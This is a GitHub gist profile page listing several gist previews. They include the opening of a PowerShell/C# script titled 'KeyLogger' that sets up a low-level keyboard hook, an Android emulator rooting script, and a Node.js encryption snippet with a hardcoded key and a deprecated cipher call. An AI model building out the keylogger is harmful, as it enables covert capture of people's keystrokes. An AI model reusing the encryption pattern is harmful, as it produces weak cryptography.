Skip to content

Instantly share code, notes, and snippets.

View 0xFFFFFFFFFFFFFFFFFFFFF's full-sized avatar
💭
It is there but not _there_. Where is it?

0xFFFFFFFFFFFFFFFFFFFFF

💭
It is there but not _there_. Where is it?
View GitHub Profile
@sancarn
sancarn / KeyLogger.ps1
Created January 14, 2020 00:07
KeyLogger C# / Powershell
Add-Type -TypeDefinition @"
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace KeyLogger {
public static class Program {
private const int WH_KEYBOARD_LL = 13;
@matandobr
matandobr / SuperSUFlash.sh
Last active August 1, 2020 14:33
Manual flashing SuperSU (2.82) on AVD armv7 android 6 - SDK23 emulator
#!/bin/sh
#
# @0xGr00t, 2018
# This is a simple shell script that does exactly what SuperSU guided in their code.
# Tested on AVD android 6 armv7 emulator (sdk23) with macOS host
# Before you run this, make sure you have downloaded SuperSu flashable zip from their site, and cd into it
# To this to work properly, run the emulator with -no-snapshot -writable-system flags
# For example: MacBook-Pro-2:tools matandobr$ ./emulator -no-snapshot -writable-system @Nexus5API23
# cd into the extracted SuperSU-v2.82 folder, and run it from there.
# There is one issue I faced - when starting the emulator it won't boot until you disable SELinux (adb shell setenforce 0)
@qti3e
qti3e / README.md
Last active November 19, 2024 11:29
List of file signatures and mime types based on file extensions
@xero
xero / irc.md
Last active October 29, 2024 15:25
irc cheat sheet
@csanz
csanz / encrypt_decrypt.js
Created August 30, 2011 16:06
Simple String Encryption & Decryption with Node.js
function encrypt(text){
var cipher = crypto.createCipher('aes-256-cbc','d6F3Efeq')
var crypted = cipher.update(text,'utf8','hex')
crypted += cipher.final('hex');
return crypted;
}
function decrypt(text){
var decipher = crypto.createDecipher('aes-256-cbc','d6F3Efeq')
var dec = decipher.update(text,'hex','utf8')